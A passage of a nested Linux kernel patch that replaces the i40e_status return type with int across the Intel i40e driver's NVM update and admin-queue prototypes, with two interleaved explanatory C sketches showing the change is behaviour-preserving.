+-				     u32 offset, u16 words, void *data,
+-				     bool last_command)
++static int i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
++			     u32 offset, u16 words, void *data,
++			     bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -594,14 +594,14 @@ static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+  * is customer specific and unknown. Therefore, this function skips all maximum
+  * possible size of VPD (1kB).
+  **/
+-static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
+-						    u16 *checksum)
++static int i40e_calc_nvm_checksum(struct i40e_hw *hw,
++				  u16 *checksum)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_virt_mem vmem;
+ 	u16 pcie_alt_module = 0;
+ 	u16 checksum_local = 0;
+ 	u16 vpd_module = 0;
++	int ret_code;
+ 	u16 *data;
+ 	u16 i = 0;
+ 
+@@ -675,11 +675,11 @@ i40e_calc_nvm_checksum_exit:
+  * on ARQ completion event reception by caller.
+  * This function will commit SR to NVM.
+  **/
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
++int i40e_update_nvm_checksum(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+-	u16 checksum;
+ 	__le16 le_sum;
++	int ret_code;
++	u16 checksum;
+ 
+ 	ret_code = i40e_calc_nvm_checksum(hw, &checksum);
+ 	if (!ret_code) {
+@@ -699,12 +699,12 @@ i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
+  * Performs checksum calculation and validates the NVM SW checksum. If the
+  * caller does not need checksum, the value can be NULL.
+  **/
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum)
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum)
+ {
+-	i40e_status ret_code = 0;
+-	u16 checksum_sr = 0;
+ 	u16 checksum_local = 0;
++	u16 checksum_sr = 0;
++	int ret_code = 0;
+ 
+ 	/* We must acquire the NVM lock in order to correctly synchronize the
+ 	 * NVM accesses across multiple PFs. Without doing so it is possible
+@@ -733,36 +733,36 @@ i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+ 	return ret_code;
+ }
+ 
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *errno);
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *errno);
+ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+ 						struct i40e_nvm_access *cmd,
+ 						int *perrno);
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno);
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno);
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno);
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno);
+ static inline u8 i40e_nvmupd_get_module(u32 val)
+ {
+ 	return (u8)(val & I40E_NVM_MOD_PNT_MASK);
+@@ -807,12 +807,12 @@ static const char * const i40e_nvm_update_state_str[] = {
+  *
+  * Dispatches command depending on what update state is current
+  **/
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *perrno)
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *perrno)
+ {
+-	i40e_status status;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status;
+ 
+ 	/* assume success */
+ 	*perrno = 0;
+@@ -923,12 +923,12 @@ i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+  * Process legitimate commands of the Init state and conditionally set next
+  * state. Reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1062,12 +1062,12 @@ static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1104,13 +1104,13 @@ static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands
+  **/
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
+ 	bool retry_attempt = false;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1187,8 +1187,8 @@ retry:
+ 	 */
+ 	if (status && (hw->aq.asq_last_status == I40E_AQ_RC_EBUSY) &&
+ 	    !retry_attempt) {
+-		i40e_status old_status = status;
+ 		u32 old_asq_status = hw->aq.asq_last_status;
++		int old_status = status;
+ 		u32 gtime;
+ 
+ 		gtime = rd32(hw, I40E_GLVFGEN_TIMER);
+@@ -1370,17 +1370,17 @@ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno)
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	struct i40e_aq_desc *aq_desc;
+ 	u32 buff_size = 0;
+ 	u8 *buff = NULL;
+ 	u32 aq_desc_len;
+ 	u32 aq_data_len;
++	int status;
+ 
+ 	i40e_debug(hw, I40E_DEBUG_NVM, "NVMUPD: %s\n", __func__);
+ 	if (cmd->offset == 0xffff)
+@@ -1429,8 +1429,8 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "i40e_nvmupd_exec_aq err %s aq_err %s\n",
+-			   i40e_stat_str(hw, status),
++			   "%s err %d aq_err %s\n",
++			   __func__, status,
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+@@ -1454,9 +1454,9 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1523,9 +1523,9 @@ static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1557,13 +1557,13 @@ static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	u8 module, transaction;
++	int status;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1596,13 +1596,13 @@ static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno)
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1636,14 +1636,14 @@ static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
+ 	u8 preservation_flags;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
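[Editorial aside, not part of the patch: the i40e_nvm.c hunks above mechanically swap the driver-private i40e_status return type for plain int. A minimal standalone sketch of the resulting caller pattern, assuming a hypothetical check_nvm() stand-in for any converted function such as i40e_read_nvm_buffer(), shows why the change is source-compatible: the retained I40E_ERR_* codes are negative ints, so callers keep testing for nonzero exactly as before.]

	/* Editorial sketch: the enum values mirror a few entries from
	 * drivers/net/ethernet/intel/i40e/i40e_status.h; check_nvm() is
	 * hypothetical and only illustrates the converted return type.
	 */
	#include <stdio.h>

	enum i40e_status_code {
		I40E_SUCCESS   = 0,
		I40E_ERR_NVM   = -1,
		I40E_ERR_PARAM = -5,
	};

	/* After the patch the function returns int but still hands back
	 * the same negative enum values; an enum constant converts to int
	 * implicitly, so no call site needs to change.
	 */
	static int check_nvm(int simulate_failure)
	{
		return simulate_failure ? I40E_ERR_NVM : I40E_SUCCESS;
	}

	int main(void)
	{
		int ret = check_nvm(1);

		if (ret)	/* same nonzero test as before the patch */
			printf("nvm err %d\n", ret); /* plain %d, no i40e_stat_str() */
		return 0;
	}
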
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_osdep.h b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+index 2f6815b2f8df8..2bd4de03dafa2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_osdep.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+@@ -56,5 +56,4 @@ do {								\
+ 			(h)->bus.func, ##__VA_ARGS__);		\
+ } while (0)
+ 
+-typedef enum i40e_status_code i40e_status;
+ #endif /* _I40E_OSDEP_H_ */
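[Editorial aside, not part of the patch: the single line removed from i40e_osdep.h above is the typedef the whole series unwinds. A toy sketch with a stand-in enum (demo_status, hypothetical) demonstrates why dropping the typedef in favour of int is behaviour-preserving: in C an enum value converts to int implicitly, so the two spellings are interchangeable at every call site this patch touches.]

	/* Editorial sketch: demo_status mimics the removed
	 * "typedef enum i40e_status_code i40e_status;" pattern.
	 */
	#include <assert.h>

	enum demo_status { DEMO_OK = 0, DEMO_ERR_NVM = -1 };
	typedef enum demo_status demo_status;	/* the pattern being removed */

	static demo_status old_style(void) { return DEMO_ERR_NVM; }
	static int new_style(void) { return DEMO_ERR_NVM; }

	int main(void)
	{
		/* Both spellings yield the same value and compare equal. */
		assert((int)old_style() == new_style());
		return 0;
	}
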
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_prototype.h b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+index 9a71121420c3b..fe845987d99a5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_prototype.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+@@ -16,29 +16,29 @@
+  */
+ 
+ /* adminq functions */
+-i40e_status i40e_init_adminq(struct i40e_hw *hw);
++int i40e_init_adminq(struct i40e_hw *hw);
+ void i40e_shutdown_adminq(struct i40e_hw *hw);
+ void i40e_adminq_init_ring_data(struct i40e_hw *hw);
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *events_pending);
+-i40e_status
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *events_pending);
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw,
+ 			 struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */
+ 			 u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+ 			 enum i40e_admin_queue_err *aq_status);
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */ u16  buff_size,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context);
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -53,327 +53,332 @@ void i40e_debug_aq(struct i40e_hw *hw, enum i40e_debug_mask mask,
+ 
+ void i40e_idle_aq(struct i40e_hw *hw);
+ bool i40e_check_asq_alive(struct i40e_hw *hw);
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
++int i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
+ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err);
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err);
+ 
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
+ 
+ u32 i40e_led_get(struct i40e_hw *hw);
+ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink);
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode);
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode);
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
+ 
+ /* admin send queue commands */
+ 
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32  reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				      struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_reset);
+-i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw,
+-				     bool ena_lpbk,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
+-				u64 advt_reg,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++				 bool qualified_modules, bool report_init,
++				 struct i40e_aq_get_phy_abilities_resp *abilities,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_reset);
++int i40e_aq_set_mac_loopback(struct i40e_hw *hw,
++			     bool ena_lpbk,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
++			       u64 advt_reg,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 vsi_id, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details,
+-		bool rx_only_promisc);
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				u16 seid, bool enable,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *pveb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id, bool *floating,
+-				u16 *statistic_index, u16 *vebs_used,
+-				u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 vsi_id, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw, u16 vsi_id, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc);
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw, u16 vsi_id, bool set,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *pveb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id, bool *floating,
++			       u16 *statistic_index, u16 *vebs_used,
++			       u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
+ 			struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+ 		       enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
++			   struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+ 			  enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free);
